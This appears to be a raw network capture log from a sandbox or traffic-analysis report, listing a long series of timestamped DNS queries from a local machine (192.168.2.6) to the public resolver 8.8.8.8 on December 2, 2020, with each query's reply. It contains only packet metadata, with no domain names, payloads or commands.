                                            Dec 2, 2020 11:53:19.864814997 CET5073353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:19.915107965 CET53507338.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:20.131280899 CET5577053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:20.166687965 CET53557708.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:20.213207006 CET5452553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:20.241362095 CET53545258.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:20.728956938 CET6176053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:20.756004095 CET53617608.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:21.179210901 CET6382253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:21.206274986 CET53638228.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:21.260250092 CET5095753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:21.295634985 CET53509578.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:21.933065891 CET5966653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:21.968331099 CET53596668.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:23.109603882 CET5222353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:23.136975050 CET53522238.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:23.221131086 CET6013653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:23.248174906 CET53601368.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:23.515954018 CET5564953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:23.543100119 CET53556498.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:23.884077072 CET5152453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:23.911144018 CET53515248.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:24.321515083 CET5914153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:24.348766088 CET53591418.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:24.618297100 CET4968253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:24.645474911 CET53496828.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:24.746162891 CET4970953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:24.775336981 CET53497098.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:25.162528038 CET5938453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:25.189646006 CET53593848.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:25.535120010 CET5028453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:25.570763111 CET53502848.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:25.711575985 CET5308953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:25.738579035 CET53530898.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:25.947319984 CET5056353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:25.974462032 CET53505638.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:26.361608982 CET5026553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:26.388704062 CET53502658.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:26.781534910 CET5544253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:26.822185993 CET53554428.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:26.857091904 CET4956153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:26.883987904 CET53495618.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:27.201503992 CET5409753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:27.228805065 CET53540978.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:27.631100893 CET5950253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:27.658185959 CET53595028.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:27.660590887 CET5795953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:27.687689066 CET53579598.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:28.056104898 CET5497153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:28.083373070 CET53549718.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:28.371154070 CET5096953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:28.398387909 CET53509698.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:28.488528967 CET5218353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:28.515634060 CET53521838.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:28.910182953 CET6335453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:28.937254906 CET53633548.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:29.182518005 CET5063553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:29.209546089 CET53506358.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:29.335936069 CET6160353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:29.363059998 CET53616038.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:29.746006012 CET5831853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:29.773325920 CET53583188.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:29.995102882 CET6082653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:30.038914919 CET53608268.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:30.157058954 CET5776353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:30.184181929 CET53577638.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:30.534432888 CET5011153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:30.561573029 CET53501118.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:30.950144053 CET5720653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:30.977451086 CET53572068.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:31.414361000 CET5713253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:31.441651106 CET53571328.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:31.786268950 CET5548353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:31.813337088 CET53554838.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:32.222188950 CET6162653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:32.249223948 CET53616268.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:32.588006020 CET5967553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:32.615169048 CET53596758.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:33.002825975 CET6014953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:33.029988050 CET53601498.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:33.441160917 CET6214153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:33.468313932 CET53621418.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:33.586114883 CET4934553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:33.613213062 CET53493458.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:33.848555088 CET6407453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:33.875742912 CET53640748.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:34.279545069 CET5582953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:34.306705952 CET53558298.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:34.717075109 CET6226053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:34.744317055 CET53622608.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:35.146568060 CET6421153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:35.173808098 CET53642118.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:35.539638042 CET5257853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:35.567707062 CET53525788.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:35.924839973 CET5071153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:35.962656021 CET53507118.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:36.347860098 CET6182053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:36.375144005 CET53618208.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:36.785064936 CET5773553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:36.812170029 CET53577358.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:37.224658012 CET5500653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:37.251827002 CET53550068.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:37.669658899 CET5606153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:37.696755886 CET53560618.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:38.092999935 CET6396953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:38.120366096 CET53639698.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:38.512728930 CET5610153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:38.513631105 CET6216753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:38.539983034 CET53561018.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:38.540633917 CET53621678.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:38.875746965 CET5892953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:38.903022051 CET53589298.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:39.301574945 CET6411353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:39.328754902 CET53641138.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:39.479305029 CET6352053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:39.506570101 CET53635208.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:39.725230932 CET5734753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:39.752509117 CET53573478.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:40.219691038 CET5183953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:40.246764898 CET53518398.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:40.580743074 CET5955253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:40.608048916 CET53595528.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:41.038954973 CET5114953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:41.066154957 CET53511498.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:41.423147917 CET6539253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:41.450228930 CET53653928.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:41.821149111 CET5683153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:41.848258972 CET53568318.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:42.263540030 CET5822453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:42.301194906 CET53582248.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:44.639374018 CET6385253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:44.666498899 CET53638528.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:45.021672964 CET5034253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:45.048715115 CET53503428.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:45.443512917 CET6274853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:45.470597029 CET53627488.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:45.885236025 CET5208453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:45.913047075 CET53520848.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:46.304502964 CET6296353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:46.331456900 CET53629638.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:46.728537083 CET5461753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:46.755785942 CET53546178.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:47.133272886 CET5896253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:47.161921024 CET53589628.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:47.572877884 CET4987953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:47.599958897 CET53498798.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:47.995712996 CET6438053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:48.022881031 CET53643808.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:48.408747911 CET6539453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:48.435914993 CET53653948.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:48.832439899 CET6544253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:48.868055105 CET53654428.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:49.251580000 CET5537153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:49.289485931 CET53553718.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:49.627768993 CET5070053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:49.663352013 CET53507008.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:50.035084009 CET5609253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:50.073008060 CET53560928.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:50.434282064 CET6321853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:50.461335897 CET53632188.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:50.894686937 CET4960553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:50.921871901 CET53496058.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:51.414562941 CET5117653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:51.441720009 CET53511768.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:51.783464909 CET6112153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:51.810755968 CET53611218.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:52.171829939 CET5726453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:52.199002981 CET53572648.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:52.585572958 CET6116553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:52.612660885 CET53611658.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:53.006575108 CET5819953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:53.033998966 CET53581998.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:53.381268024 CET5244153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:53.416918993 CET53524418.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:53.810909986 CET4950453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:53.838108063 CET53495048.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:53.976850986 CET6180353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:54.022886038 CET53618038.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:54.208628893 CET5989553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:54.235838890 CET53598958.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:54.629021883 CET5885253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:54.656433105 CET53588528.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:55.050055027 CET5940453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:55.077317953 CET53594048.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:55.423598051 CET5879653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:55.459783077 CET53587968.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:55.850387096 CET6013453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:55.877650976 CET53601348.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:56.248869896 CET5910153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:56.276166916 CET53591018.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:56.647577047 CET4998253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:56.674808979 CET53499828.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:57.027770042 CET5490353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:57.063438892 CET53549038.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:57.430881977 CET5655553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:57.458266973 CET53565558.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:57.886060953 CET5407653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:57.913239002 CET53540768.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:58.272211075 CET6058853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:58.299415112 CET53605888.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:58.649456024 CET6013053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:58.685028076 CET53601308.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:59.079360962 CET6166753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:59.106694937 CET53616678.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:59.472974062 CET4948653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:59.500181913 CET53494868.8.8.8192.168.2.6
                                            Dec 2, 2020 11:53:59.913703918 CET6355353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:53:59.940876961 CET53635538.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:00.307252884 CET5657353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:00.334629059 CET53565738.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:00.705884933 CET6097653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:00.741585016 CET53609768.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:01.120301008 CET6013553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:01.147563934 CET53601358.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:01.509221077 CET6485153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:01.536607981 CET53648518.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:01.956480980 CET6035353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:01.983613968 CET53603538.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:02.397713900 CET5454653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:02.424917936 CET53545468.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:02.774084091 CET5288853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:02.809814930 CET53528888.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:03.318240881 CET5567653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:03.345489025 CET53556768.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:03.729955912 CET5656353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:03.757989883 CET53565638.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:04.140897989 CET6493153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:04.168210030 CET53649318.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:04.599097967 CET6401853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:04.626287937 CET53640188.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:04.985646963 CET6337353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:05.023329020 CET53633738.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:05.616873026 CET4967353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:05.644040108 CET53496738.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:06.028312922 CET5119653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:06.055572033 CET53511968.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:06.426261902 CET5178053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:06.453480005 CET53517808.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:06.822459936 CET5767053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:06.849554062 CET53576708.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:07.286889076 CET5790253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:07.314105034 CET53579028.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:07.661478996 CET5440253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:07.688730955 CET53544028.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:08.032965899 CET5051953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:08.060218096 CET53505198.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:08.417562962 CET5465153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:08.444842100 CET53546518.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:08.915608883 CET5562453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:08.951280117 CET53556248.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:09.930711985 CET5630053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:09.958149910 CET53563008.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:11.526834011 CET4972053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:11.553925991 CET53497208.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:11.984951019 CET6020553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:12.012125969 CET53602058.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:12.548167944 CET5350353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:12.575284958 CET53535038.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:12.928486109 CET5730053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:12.955569983 CET53573008.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:13.366381884 CET5643153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:13.393708944 CET53564318.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:13.817374945 CET6507253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:13.844626904 CET53650728.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:14.184145927 CET6090653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:14.211426020 CET53609068.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:14.635570049 CET5127453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:14.662740946 CET53512748.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:15.045031071 CET5829753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:15.072242975 CET53582978.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:15.459170103 CET5010953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:15.486371994 CET53501098.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:15.820738077 CET5632053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:15.847944975 CET53563208.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:16.267661095 CET5002253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:16.294827938 CET53500228.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:16.449919939 CET5835153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:16.477046967 CET53583518.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:16.631093979 CET5417353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:16.658166885 CET53541738.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:17.072542906 CET5490053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:17.099864960 CET53549008.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:17.425602913 CET6223253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:17.452892065 CET53622328.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:17.846313953 CET5258453192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:17.873565912 CET53525848.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:18.235343933 CET5386853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:18.262433052 CET53538688.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:18.702311039 CET5628953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:18.729583979 CET53562898.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:19.151036978 CET5761253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:19.178170919 CET53576128.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:19.527997017 CET5738853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:19.566035986 CET53573888.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:19.926543951 CET6034153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:19.954097033 CET53603418.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:20.382962942 CET6175653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:20.410152912 CET53617568.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:20.773883104 CET5600753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:20.801265001 CET53560078.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:21.157676935 CET6044353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:21.193521976 CET53604438.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:21.525206089 CET5445553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:21.552454948 CET53544558.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:21.906178951 CET5242953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:21.933320999 CET53524298.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:22.302553892 CET5003753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:22.338968992 CET53500378.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:22.729923010 CET5503253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:22.757113934 CET53550328.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:23.100929022 CET5338353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:23.128216028 CET53533838.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:23.510452986 CET6372153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:23.537627935 CET53637218.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:23.916831970 CET5191953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:23.944153070 CET53519198.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:24.330015898 CET5637053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:24.356986046 CET53563708.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:24.777729988 CET6225653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:24.804790974 CET53622568.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:25.196018934 CET5523153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:25.223370075 CET53552318.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:25.633527994 CET5760253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:25.660767078 CET53576028.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:26.057401896 CET6197253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:26.084630966 CET53619728.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:26.484194040 CET6201553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:26.511482000 CET53620158.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:26.873094082 CET5729053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:26.911792994 CET53572908.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:27.340032101 CET5289153192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:27.375550985 CET53528918.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:27.751902103 CET5285953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:27.779042959 CET53528598.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:28.121882915 CET6291253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:28.149195910 CET53629128.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:28.559003115 CET5504753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:28.586132050 CET53550478.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:29.007213116 CET5211853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:29.034487963 CET53521188.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:29.390543938 CET5188653192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:29.417880058 CET53518868.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:29.797132969 CET5278953192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:29.824332952 CET53527898.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:30.181869030 CET5273853192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:30.208987951 CET53527388.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:30.601612091 CET6385053192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:30.628851891 CET53638508.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:30.985236883 CET6509553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:31.012420893 CET53650958.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:31.439317942 CET5044253192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:31.466401100 CET53504428.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:31.882524014 CET5346353192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:31.909837961 CET53534638.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:32.338794947 CET5562753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:32.366041899 CET53556278.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:32.798295021 CET5671653192.168.2.68.8.8.8
